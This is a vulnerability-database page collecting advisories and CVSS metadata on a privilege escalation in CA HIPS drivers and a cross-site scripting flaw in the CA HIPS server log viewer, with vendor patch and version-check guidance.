This includes: * Reason for rating * Extended description * Extended solution * Exploit code or links to exploit code * Deep links
Read the full description: http://corporate.secunia.com/products/48/?r=l
Contact Secunia Sales for more information: http://corporate.secunia.com/how_to_buy/15/?r=l
TITLE: CA Personal Firewall HIPS Drivers Privilege Escalation
SECUNIA ADVISORY ID: SA22972
VERIFY ADVISORY: http://secunia.com/advisories/22972/
CRITICAL: Less critical
IMPACT: Privilege escalation
WHERE: Local system
SOFTWARE: CA Personal Firewall 2007 9.x http://secunia.com/product/12660/
DESCRIPTION: Rub\xe9n Santamarta has reported some vulnerabilities in CA Personal Firewall, which can be exploited by malicious people to gain escalated privileges.
The vulnerabilities are caused due to errors in the HIPS Core (KmxStart.sys) and HIPS Firewall (KmxFw.sys) drivers. This can be exploited to modify some implemented callbacks via certain privileged IOCTLs. Other versions and products may also be affected.
SOLUTION: Grant only trusted users access to affected systems.
The vendor is reportedly working on the patches.
PROVIDED AND/OR DISCOVERED BY: Rub\xe9n Santamarta, reversemode.com.
ORIGINAL ADVISORY: Reversemode.com: http://www.reversemode.com/index.php?option=com_remository&Itemid=2&func=fileinfo&id=38
About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities.
Subscribe: http://secunia.com/secunia_security_advisories/
Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/
Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor.
Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
. Local attackers can exploit these vulnerabilities to gain escalated privileges.
Mitigating Factors: Local user account required for exploitation.
Severity: CA has given these vulnerability issues a Medium risk rating. Customers running one of the affected products simply need to ensure that they have allowed this automatic update to take place.
Determining if you are affected: To ensure that the update has taken place, customers can view the Help > About screen in their CA Personal Firewall product and confirm that their engine version number is 1.0.176 or higher. http://marc.theaimsgroup.com/?l=bugtraq&m=116379521731676&w=2
Changelog for this advisory: v1.0 - Initial Release
Customers who require additional information should contact CA Technical Support at http://supportconnect.ca.com.
For technical questions or comments related to this advisory, please send email to vuln@ca.com.
If you discover a vulnerability in CA products, please report your findings to vuln@ca.com, or utilize our "Submit a Vulnerability" form. URL: http://www3.ca.com/securityadvisor/vulninfo/submit.aspx
Regards, Ken Williams ; 0xE2941985 Director, CA Vulnerability Research
CA, One CA Plaza, Islandia, NY 11749
Contact http://www3.ca.com/contact/ Legal Notice http://www3.ca.com/legal/ Privacy Policy http://www3.ca.com/privacy/ Copyright (c) 2007 CA. All rights reserved
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-200701-0265",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "host-based intrusion prevention system",
"scope": "eq",
"trust": 1.6,
"vendor": "ca",
"version": "firewall_6.5.4.10"
},
{
"model": "host-based intrusion prevention system",
"scope": "eq",
"trust": 1.6,
"vendor": "ca",
"version": "core_6.5.4.31"
},
{
"model": "host-based intrusion prevention system",
"scope": "eq",
"trust": 0.8,
"vendor": "ca",
"version": "core kmxstart.sys 6.5.4.31"
},
{
"model": "host-based intrusion prevention system",
"scope": "eq",
"trust": 0.8,
"vendor": "ca",
"version": "firewall kmxfw.sys 6.5.4.10"
},
{
"model": "associates personal firewall",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "9.0"
},
{
"model": "associates internet security suite",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "20073.0"
},
{
"model": "associates internet security suite",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "20070"
}
],
"sources": [
{
"db": "BID",
"id": "21140"
},
{
"db": "JVNDB",
"id": "JVNDB-2007-001244"
},
{
"db": "NVD",
"id": "CVE-2006-6952"
},
{
"db": "CNNVD",
"id": "CNNVD-200701-407"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:ca:host-based_intrusion_prevention_system:core_6.5.4.31:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:ca:host-based_intrusion_prevention_system:firewall_6.5.4.10:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2006-6952"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Rub\u00e9n Santamarta",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200701-407"
}
],
"trust": 0.6
},
"cve": "CVE-2006-6952",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "COMPLETE",
"baseScore": 7.2,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 3.9,
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"obtainAllPrivilege": true,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Local",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Complete",
"baseScore": 7.2,
"confidentialityImpact": "Complete",
"exploitabilityScore": null,
"id": "CVE-2006-6952",
"impactScore": null,
"integrityImpact": "Complete",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "COMPLETE",
"baseScore": 7.2,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 3.9,
"id": "VHN-23060",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:L/AC:L/AU:N/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "NVD",
"id": "CVE-2006-6952",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-200701-407",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-23060",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-23060"
},
{
"db": "JVNDB",
"id": "JVNDB-2007-001244"
},
{
"db": "NVD",
"id": "CVE-2006-6952"
},
{
"db": "CNNVD",
"id": "CNNVD-200701-407"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Computer Associates Host Intrusion Prevention System (HIPS) drivers (1) Core kmxstart.sys 6.5.4.31 and (2) Firewall kmxfw.sys 6.5.4.10 allow local users to gain privileges by using certain privileged IOCTLs to modify callback function pointers. Multiple Computer Associates security-related products are prone to multiple local privilege-escalation vulnerabilities. \nAn attacker can leverage these issues to execute arbitrary code with SYSTEM-level privileges. This could result in the complete compromise of vulnerable computers. \nThese isses affect CA Personal Firewall 2007 (v9.0) Engine version 1.0.173 and prior and CA Internet Security Suite 2007 version 3.0 with CA Personal Firewall 2007 version 9.0 Engine version 1.0.173 and prior. Computer Associates is the world\u0027s leading security vendor, products include a variety of anti-virus software and backup recovery systems. There is a problem in the implementation of the driver of CA HIPS products, and local attackers may use this vulnerability to elevate their privileges. \n\n----------------------------------------------------------------------\n\nTo improve our services to our customers, we have made a number of\nadditions to the Secunia Advisories and have started translating the\nadvisories to German. \n\nThe improvements will help our customers to get a better\nunderstanding of how we reached our conclusions, how it was rated,\nour thoughts on exploitation, attack vectors, and scenarios. \n\nThis includes:\n* Reason for rating\n* Extended description\n* Extended solution\n* Exploit code or links to exploit code\n* Deep links\n\nRead the full description:\nhttp://corporate.secunia.com/products/48/?r=l\n\nContact Secunia Sales for more information:\nhttp://corporate.secunia.com/how_to_buy/15/?r=l\n\n----------------------------------------------------------------------\n\nTITLE:\nCA Personal Firewall HIPS Drivers Privilege Escalation\n\nSECUNIA ADVISORY ID:\nSA22972\n\nVERIFY ADVISORY:\nhttp://secunia.com/advisories/22972/\n\nCRITICAL:\nLess critical\n\nIMPACT:\nPrivilege escalation\n\nWHERE:\nLocal system\n\nSOFTWARE:\nCA Personal Firewall 2007 9.x\nhttp://secunia.com/product/12660/\n\nDESCRIPTION:\nRub\\xe9n Santamarta has reported some vulnerabilities in CA Personal\nFirewall, which can be exploited by malicious people to gain\nescalated privileges. \n\nThe vulnerabilities are caused due to errors in the HIPS Core\n(KmxStart.sys) and HIPS Firewall (KmxFw.sys) drivers. This can be\nexploited to modify some implemented callbacks via certain privileged\nIOCTLs. Other versions and products may also be affected. \n\nSOLUTION:\nGrant only trusted users access to affected systems. \n\nThe vendor is reportedly working on the patches. \n\nPROVIDED AND/OR DISCOVERED BY:\nRub\\xe9n Santamarta, reversemode.com. \n\nORIGINAL ADVISORY:\nReversemode.com:\nhttp://www.reversemode.com/index.php?option=com_remository\u0026Itemid=2\u0026func=fileinfo\u0026id=38\n\n----------------------------------------------------------------------\n\nAbout:\nThis Advisory was delivered by Secunia as a free service to help\neverybody keeping their systems up to date against the latest\nvulnerabilities. \n\nSubscribe:\nhttp://secunia.com/secunia_security_advisories/\n\nDefinitions: (Criticality, Where etc.)\nhttp://secunia.com/about_secunia_advisories/\n\n\nPlease Note:\nSecunia recommends that you verify all advisories you receive by\nclicking the link. \nSecunia NEVER sends attached files with advisories. \nSecunia does not advise people to install third party patches, only\nuse those supplied by the vendor. \n\n----------------------------------------------------------------------\n\nUnsubscribe: Secunia Security Advisories\nhttp://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org\n\n----------------------------------------------------------------------\n\n\n. Local attackers can exploit these vulnerabilities to gain \nescalated privileges. \n\nMitigating Factors: Local user account required for exploitation. \n\nSeverity: CA has given these vulnerability issues a Medium risk \nrating. Customers running one of the affected products \nsimply need to ensure that they have allowed this automatic update \nto take place. \n\nDetermining if you are affected:\nTo ensure that the update has taken place, customers can view the \nHelp \u003e About screen in their CA Personal Firewall product and \nconfirm that their engine version number is 1.0.176 or higher. \nhttp://marc.theaimsgroup.com/?l=bugtraq\u0026m=116379521731676\u0026w=2\n\nChangelog for this advisory:\nv1.0 - Initial Release\n\nCustomers who require additional information should contact CA \nTechnical Support at http://supportconnect.ca.com. \n\nFor technical questions or comments related to this advisory,\nplease send email to vuln@ca.com. \n\nIf you discover a vulnerability in CA products, please report\nyour findings to vuln@ca.com, or utilize our \"Submit a \nVulnerability\" form. \nURL: http://www3.ca.com/securityadvisor/vulninfo/submit.aspx\n\n\nRegards,\nKen Williams ; 0xE2941985\nDirector, CA Vulnerability Research\n\nCA, One CA Plaza, Islandia, NY 11749\n\t\nContact http://www3.ca.com/contact/\nLegal Notice http://www3.ca.com/legal/\nPrivacy Policy http://www3.ca.com/privacy/\nCopyright (c) 2007 CA. All rights reserved",
"sources": [
{
"db": "NVD",
"id": "CVE-2006-6952"
},
{
"db": "JVNDB",
"id": "JVNDB-2007-001244"
},
{
"db": "BID",
"id": "21140"
},
{
"db": "VULHUB",
"id": "VHN-23060"
},
{
"db": "PACKETSTORM",
"id": "52231"
},
{
"db": "PACKETSTORM",
"id": "53998"
}
],
"trust": 2.16
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.scap.org.cn/vuln/vhn-23060",
"trust": 0.1,
"type": "unknown"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-23060"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2006-6952",
"trust": 2.9
},
{
"db": "BID",
"id": "21140",
"trust": 2.0
},
{
"db": "SECUNIA",
"id": "22972",
"trust": 1.8
},
{
"db": "OSVDB",
"id": "30497",
"trust": 1.8
},
{
"db": "OSVDB",
"id": "30498",
"trust": 1.8
},
{
"db": "JVNDB",
"id": "JVNDB-2007-001244",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-200701-407",
"trust": 0.7
},
{
"db": "BUGTRAQ",
"id": "20070124 [CAID 34818]: CA PERSONAL FIREWALL MULTIPLE PRIVILEGE ESCALATION VULNERABILITIES",
"trust": 0.6
},
{
"db": "BUGTRAQ",
"id": "20061116 [REVERSEMODE ADVISORY] COMPUTER ASSOCIATES HIPS DRIVERS - MULTIPLE LOCAL PRIVILEGE ESCALATION VULNERABILITIES.",
"trust": 0.6
},
{
"db": "BUGTRAQ",
"id": "20061121 RE: [REVERSEMODE ADVISORY] COMPUTER ASSOCIATES HIPS DRIVERS - MULTIPLE LOCAL PRIVILEGE ESCALATION VULNERABILITIES.",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "53998",
"trust": 0.2
},
{
"db": "EXPLOIT-DB",
"id": "29069",
"trust": 0.1
},
{
"db": "EXPLOIT-DB",
"id": "29070",
"trust": 0.1
},
{
"db": "SEEBUG",
"id": "SSVID-82607",
"trust": 0.1
},
{
"db": "SEEBUG",
"id": "SSVID-82608",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-23060",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "52231",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-23060"
},
{
"db": "BID",
"id": "21140"
},
{
"db": "JVNDB",
"id": "JVNDB-2007-001244"
},
{
"db": "PACKETSTORM",
"id": "52231"
},
{
"db": "PACKETSTORM",
"id": "53998"
},
{
"db": "NVD",
"id": "CVE-2006-6952"
},
{
"db": "CNNVD",
"id": "CNNVD-200701-407"
}
]
},
"id": "VAR-200701-0265",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-23060"
}
],
"trust": 0.01
},
"last_update_date": "2023-12-18T14:06:46.828000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "http://www.ca.com/"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2007-001244"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "NVD-CWE-Other",
"trust": 1.0
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2006-6952"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.8,
"url": "http://www3.ca.com/securityadvisor/newsinfo/collateral.aspx?cid=97729"
},
{
"trust": 1.8,
"url": "http://www3.ca.com/securityadvisor/vulninfo/vuln.aspx?id=34818"
},
{
"trust": 1.7,
"url": "http://www.securityfocus.com/bid/21140"
},
{
"trust": 1.7,
"url": "http://www.securityfocus.com/archive/1/452286/100/0/threaded"
},
{
"trust": 1.7,
"url": "http://www.osvdb.org/30497"
},
{
"trust": 1.7,
"url": "http://www.osvdb.org/30498"
},
{
"trust": 1.7,
"url": "http://secunia.com/advisories/22972"
},
{
"trust": 1.7,
"url": "http://www.reversemode.com/index.php?option=com_remository\u0026itemid=2\u0026func=fileinfo\u0026id=38"
},
{
"trust": 1.1,
"url": "http://www.securityfocus.com/archive/1/451952/100/0/threaded"
},
{
"trust": 1.1,
"url": "http://www.securityfocus.com/archive/1/458040/100/200/threaded"
},
{
"trust": 0.9,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2006-6952"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2006-6952"
},
{
"trust": 0.6,
"url": "http://www.securityfocus.com/archive/1/archive/1/451952/100/0/threaded"
},
{
"trust": 0.6,
"url": "http://www.securityfocus.com/archive/1/archive/1/458040/100/200/threaded"
},
{
"trust": 0.3,
"url": "http://www.reversemode.com/index.php?option=com_remository\u0026itemid=2\u0026func=download\u0026id=38\u0026chk=23a19c23a44e6095e872e8b3f7fca9c8"
},
{
"trust": 0.3,
"url": "http://www.ca.com"
},
{
"trust": 0.3,
"url": "/archive/1/451952"
},
{
"trust": 0.3,
"url": "/archive/1/452286"
},
{
"trust": 0.1,
"url": "http://www.reversemode.com/index.php?option=com_remository\u0026amp;itemid=2\u0026amp;func=fileinfo\u0026amp;id=38"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/22972/"
},
{
"trust": 0.1,
"url": "http://secunia.com/secunia_security_advisories/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/12660/"
},
{
"trust": 0.1,
"url": "http://corporate.secunia.com/products/48/?r=l"
},
{
"trust": 0.1,
"url": "http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org"
},
{
"trust": 0.1,
"url": "http://corporate.secunia.com/how_to_buy/15/?r=l"
},
{
"trust": 0.1,
"url": "http://secunia.com/about_secunia_advisories/"
},
{
"trust": 0.1,
"url": "http://www.reversemode.com/index.php?option=com_content\u0026task=view\u0026id=27\u0026itemid=2"
},
{
"trust": 0.1,
"url": "http://osvdb.org/30498"
},
{
"trust": 0.1,
"url": "http://marc.theaimsgroup.com/?l=bugtraq\u0026m=116379521731676\u0026w=2"
},
{
"trust": 0.1,
"url": "http://supportconnect.ca.com."
},
{
"trust": 0.1,
"url": "http://www3.ca.com/legal/"
},
{
"trust": 0.1,
"url": "http://crm.my-etrust.com/login.asp?username=guest\u0026target=document\u0026openparameter=2680"
},
{
"trust": 0.1,
"url": "http://supportconnect.ca.com/"
},
{
"trust": 0.1,
"url": "http://osvdb.org/30497"
},
{
"trust": 0.1,
"url": "http://www3.ca.com/contact/"
},
{
"trust": 0.1,
"url": "http://www3.ca.com/privacy/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2006-6952"
},
{
"trust": 0.1,
"url": "http://www3.ca.com/securityadvisor/vulninfo/submit.aspx"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-23060"
},
{
"db": "BID",
"id": "21140"
},
{
"db": "JVNDB",
"id": "JVNDB-2007-001244"
},
{
"db": "PACKETSTORM",
"id": "52231"
},
{
"db": "PACKETSTORM",
"id": "53998"
},
{
"db": "NVD",
"id": "CVE-2006-6952"
},
{
"db": "CNNVD",
"id": "CNNVD-200701-407"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-23060"
},
{
"db": "BID",
"id": "21140"
},
{
"db": "JVNDB",
"id": "JVNDB-2007-001244"
},
{
"db": "PACKETSTORM",
"id": "52231"
},
{
"db": "PACKETSTORM",
"id": "53998"
},
{
"db": "NVD",
"id": "CVE-2006-6952"
},
{
"db": "CNNVD",
"id": "CNNVD-200701-407"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2007-01-24T00:00:00",
"db": "VULHUB",
"id": "VHN-23060"
},
{
"date": "2006-11-16T00:00:00",
"db": "BID",
"id": "21140"
},
{
"date": "2012-06-26T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2007-001244"
},
{
"date": "2006-11-17T23:30:18",
"db": "PACKETSTORM",
"id": "52231"
},
{
"date": "2007-01-27T03:02:12",
"db": "PACKETSTORM",
"id": "53998"
},
{
"date": "2007-01-24T23:28:00",
"db": "NVD",
"id": "CVE-2006-6952"
},
{
"date": "2006-11-16T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200701-407"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-10-16T00:00:00",
"db": "VULHUB",
"id": "VHN-23060"
},
{
"date": "2007-01-25T22:29:00",
"db": "BID",
"id": "21140"
},
{
"date": "2012-06-26T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2007-001244"
},
{
"date": "2018-10-16T16:29:10.037000",
"db": "NVD",
"id": "CVE-2006-6952"
},
{
"date": "2007-01-25T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200701-407"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "local",
"sources": [
{
"db": "BID",
"id": "21140"
},
{
"db": "PACKETSTORM",
"id": "53998"
},
{
"db": "CNNVD",
"id": "CNNVD-200701-407"
}
],
"trust": 1.0
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Computer Associates HIPS Driver Core kmxstart.sys Vulnerabilities in which user privileges are acquired",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2007-001244"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Design Error",
"sources": [
{
"db": "BID",
"id": "21140"
},
{
"db": "CNNVD",
"id": "CNNVD-200701-407"
}
],
"trust": 0.9
}
}
VAR-200710-0051
Vulnerability from variot - Updated: 2023-12-18 14:06Cross-site scripting (XSS) vulnerability in the Server component in CA Host-Based Intrusion Prevention System (HIPS) before 8.0.0.93 allows remote attackers to inject arbitrary web script or HTML via requests that are written to logs for later display in the log viewer. Attacker-supplied HTML and script code would execute in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user; other attacks are also possible. This issue affects versions of CA HIPS prior to 8.0.0.93. CA-based host intrusion detection system (HIPS) combines independent firewall, intrusion detection and defense capabilities to provide active centralized threat defense.
Try a new way to discover vulnerabilities that ALREADY EXIST in your IT infrastructure.
The Secunia NSI enables you to INSPECT, DISCOVER, and DOCUMENT vulnerabilities in more than 4,700 different Windows applications.
Input passed in certain requests to the server is not properly sanitised before being logged.
The vulnerability is reported in versions prior to 8.0.0.93.
SOLUTION: Apply patches. http://supportconnect.ca.com/sc/redir.jsp?reqPage=search&searchID=QO91494
PROVIDED AND/OR DISCOVERED BY: The vendor credits David Maciejak.
ORIGINAL ADVISORY: http://supportconnectw.ca.com/public/cahips/infodocs/cahips-secnotice.asp
About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities.
Subscribe: http://secunia.com/secunia_security_advisories/
Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/
Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor.
Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
Title: [CAID 35754]: CA Host-Based Intrusion Prevention System (CA HIPS) Server Vulnerability
CA Vuln ID (CAID): 35754
CA Advisory Date: 2007-10-18
Reported By: David Maciejak
Impact: A remote attacker can take unauthorized administrative action. The vulnerability, CVE-2007-5472, occurs due to raw request data being displayed in the log when viewed by a browser. Note: The client installation is not vulnerable.
Mitigating Factors: The client installation is not vulnerable.
Severity: CA has given these vulnerabilities a maximum risk rating of Medium.
Affected Products: CA Host-Based Intrusion Prevention System (CA HIPS) r8
Affected Platforms: Windows
Status and Recommendation: CA has issued the following patch to address the vulnerabilities. CA Host-Based Intrusion Prevention System (CA HIPS) r8: QO91494
How to determine if you are affected: 1. Log in to the HIPS Administration Console. 2. Scroll down to the end of the Main page. 3. Press the "About" link on the right bottom side of the page. 4. Check the version. If the version is less than 8.0.0.93, the installation is vulnerable.
Workaround: None
References (URLs may wrap): CA SupportConnect: http://supportconnect.ca.com/ Security Notice for CA Host-Based Intrusion Prevention System (CA HIPS) Server http://supportconnectw.ca.com/public/cahips/infodocs/cahips-secnotice.asp Solution Document Reference APARs: QO91494 CA Security Advisor posting: CA Host-Based Intrusion Prevention System (CA HIPS) Server Vulnerability http://www.ca.com/us/securityadvisor/newsinfo/collateral.aspx?cid=158327 CA Vuln ID (CAID): 35754 http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35754 Reported By: David Maciejak CVE References: CVE-2007-5472 - log content injection http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5472 OSVDB References: Pending http://osvdb.org/
Changelog for this advisory: v1.0 - Initial Release
Customers who require additional information should contact CA Technical Support at http://supportconnect.ca.com.
For technical questions or comments related to this advisory, please send email to vuln AT ca DOT com.
If you discover a vulnerability in CA products, please report your findings to vuln AT ca DOT com, or utilize our "Submit a Vulnerability" form. URL: http://www.ca.com/us/securityadvisor/vulninfo/submit.aspx
Regards, Ken Williams ; 0xE2941985 Director, CA Vulnerability Research
CA, 1 CA Plaza, Islandia, NY 11749
Contact http://www.ca.com/us/contact/ Legal Notice http://www.ca.com/us/legal/ Privacy Policy http://www.ca.com/us/privacy/ Copyright (c) 2007 CA. All rights reserved.
-----BEGIN PGP SIGNATURE----- Version: PGP Desktop 9.5.3 (Build 5003)
wj8DBQFHGLWAeSWR3+KUGYURAlHTAJ9Wee7boFMoFj8p/dsrJl7YbkWmvQCbBeJ0 YlGWH5DdYWfAT3nGzaxImnk= =bkku -----END PGP SIGNATURE-----
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
